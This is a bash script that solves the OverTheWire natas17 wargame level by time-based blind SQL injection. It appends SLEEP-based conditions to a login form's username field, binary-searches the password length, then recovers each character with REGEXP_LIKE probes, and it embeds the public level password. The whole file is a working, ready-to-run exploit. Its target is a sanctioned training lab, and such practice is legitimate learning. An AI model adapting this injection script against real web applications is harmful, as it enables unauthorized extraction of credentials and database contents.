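#!/usr/bin/env bash
#
# natas17 -> natas18: time-based blind SQL injection.
#
# natas17's login form interpolates the submitted username into a MySQL query
# and gives no visible feedback, so every yes/no question is answered by
# appending `AND SLEEP(DELAY)`: a slow response means the injected condition
# evaluated true for the target row.  The password is recovered in two phases:
#   1. binary search on LENGTH(password)
#   2. for each position, identify the charset with a bracket range, then
#      binary-search inside that charset using REGEXP_LIKE
#
# Requires bash 4.3+ and curl with network access to natas.labs.overthewire.org.
# Optional environment:
#   NATAS17_PASSWORD  overrides the built-in level password
#   RESUME_PREFIX     leading characters already recovered by an earlier run
#
# Results go to stdout; all progress/status output goes to stderr.
set -euo pipefail

readonly USERNAME="natas17"
# OverTheWire level passwords are public by design, so a default is kept here;
# the env override avoids editing the file when the level password rotates.
PASSWORD="${NATAS17_PASSWORD:-EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC}"
readonly PASSWORD
readonly TARGET="natas18"
# Seconds the server sleeps when the injected condition holds.
readonly DELAY=4
# Characters already known from an interrupted run; empty for a cold start.
RESUME_PREFIX="${RESUME_PREFIX:-}"
# Consecutive rounds in which no charset matched before the search aborts,
# instead of spinning forever on an unreliable oracle.
readonly MAX_MISSES=3

readonly LOWER="abcdefghijklmnopqrstuvwxyz"
readonly UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
readonly DIGIT="0123456789"

# Status line on stderr (stdout is reserved for results).
log() { printf '%s\n' "$*" >&2; }
# In-place progress line on stderr (overwritten by the next status).
status() { printf '%s\r' "$*" >&2; }
# Abort with a message.
die() { log "[!] $*"; exit 1; }

# Current wall-clock time in microseconds on stdout.  Uses bash 5's
# EPOCHREALTIME when present (decimal separator may be '.' or ',' depending on
# locale) and falls back to GNU date otherwise.
now_us() {
  if [[ -n "${EPOCHREALTIME:-}" ]]; then
    printf '%s\n' "${EPOCHREALTIME/[.,]/}"
  else
    printf '%s\n' "$(( $(date +%s%N) / 1000 ))"
  fi
}

# Send one injected query.
#   $1  boolean SQL expression; the server sleeps DELAY seconds iff it is true
# The payload closes the username string, ANDs in the probe and comments out
# the remainder of the original query.  It is URL-encoded so characters such
# as '#', '+', '&' and spaces survive the POST body intact.  Credentials are
# passed as a curl config on stdin rather than on argv so they do not appear
# in `ps` output.  Returns curl's exit status.
req() {
  local cond=$1
  local payload="username=${TARGET}\" AND ${cond} AND SLEEP(${DELAY}) # "
  curl -sS -K - -X POST \
    --data-urlencode "$payload" \
    "http://${USERNAME}.natas.labs.overthewire.org/index.php" \
    >/dev/null <<<"user = \"${USERNAME}:${PASSWORD}\""
}

# Ask the oracle a yes/no question.
#   $1  boolean SQL expression
# Returns 0 when the round trip took long enough to have hit SLEEP(), 1
# otherwise.  The cutoff is DELAY/2 so network jitter on either side cannot
# flip the answer; a failed request aborts rather than being read as "no".
ask() {
  local cond=$1 start end
  start=$(now_us)
  req "$cond" || die "request failed (network or credentials?)"
  end=$(now_us)
  (( (end - start) * 2 >= DELAY * 1000000 ))
}

# Is "LENGTH(password) $1" true?  $1 is a comparison suffix, e.g. ">32", "=32".
length_is() {
  ask "LENGTH(password)$1"
}

# Does the password match ^$1[a-zA-Z0-9]*$ (case-sensitive)?
#   $1  literal prefix, optionally followed by one bracket class such as [a-m]
# The trailing [a-zA-Z0-9]* also asserts that the rest of the password is
# alphanumeric; a password with other characters would never match and the
# search would stall (see MAX_MISSES).
prefix_matches() {
  ask "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')"
}

# Binary-search the password length and print it on stdout.
#   $1  lower bound, exclusive (default 1)
#   $2  upper bound, inclusive (default 100)
# Aborts if the final candidate is not confirmed by an equality probe, which
# is what happens when the true length lies outside the bounds or the oracle
# never fired.
get_length() {
  local lo=${1:-1} hi=${2:-100} mid
  local fmt="[-] Guess: %${#hi}s-%-${#hi}s"
  log "[*] Guessing length"
  while (( hi - lo > 1 )); do
    # shellcheck disable=SC2059 -- width is baked into the format on purpose
    status "$(printf "$fmt" "$lo" "$hi")"
    mid=$(( (lo + hi) / 2 ))
    if length_is ">$mid"; then
      lo=$mid
    else
      hi=$mid
    fi
  done
  length_is "=$hi" || die "length $hi not confirmed; widen the bounds or check the oracle"
  log "[+] Length: $hi"
  printf '%s\n' "$hi"
}

# Recover the password one character at a time and print it on stdout.
#   $1  total password length
#   $2  optional already-known prefix to resume from
exploit_oracle() {
  local length=$1 known=${2:-}
  local charset lo hi mid found misses=0
  log "[@] Forcing oracle exploit"
  (( ${#known} <= length )) || die "resume prefix is longer than the password"
  while (( ${#known} < length )); do
    found=""
    for charset in "$LOWER" "$UPPER" "$DIGIT"; do
      lo=1
      hi=${#charset}
      status "[*] ?? [${charset:0:1}-${charset:hi-1:1}]"
      prefix_matches "${known}[${charset:0:1}-${charset:hi-1:1}]" || continue
      log "[+] Found[CHARSET]: $charset"
      # Invariant: the next character is charset[lo..hi] (1-based, inclusive).
      while (( hi - lo > 1 )); do
        mid=$(( (lo + hi) / 2 ))
        status "[*] Guess: [${charset:lo-1:1}-${charset:mid-1:1}]"
        if prefix_matches "${known}[${charset:lo-1:1}-${charset:mid-1:1}]"; then
          hi=$mid
        else
          lo=$(( mid + 1 ))
        fi
      done
      # Either one candidate is left, or two: probe the lower one explicitly.
      if (( lo == hi )) || prefix_matches "${known}${charset:lo-1:1}"; then
        found=${charset:lo-1:1}
      else
        found=${charset:hi-1:1}
      fi
      break
    done
    if [[ -z "$found" ]]; then
      if (( ++misses >= MAX_MISSES )); then
        die "no charset matched at position $(( ${#known} + 1 )); oracle unreliable or password not alphanumeric"
      fi
      log "[-] No charset matched at position $(( ${#known} + 1 )), retrying ($misses/$MAX_MISSES)"
      continue
    fi
    misses=0
    known="${known}${found}"
    log "[+] Update: $found -> $known"
  done
  printf '%s\n' "$known"
}

main() {
  local length password
  length=$(get_length)
  password=$(exploit_oracle "$length" "$RESUME_PREFIX")
  log "[+] Password for ${TARGET}: ${password}"
  printf '%s\n' "$password"
}

main "$@"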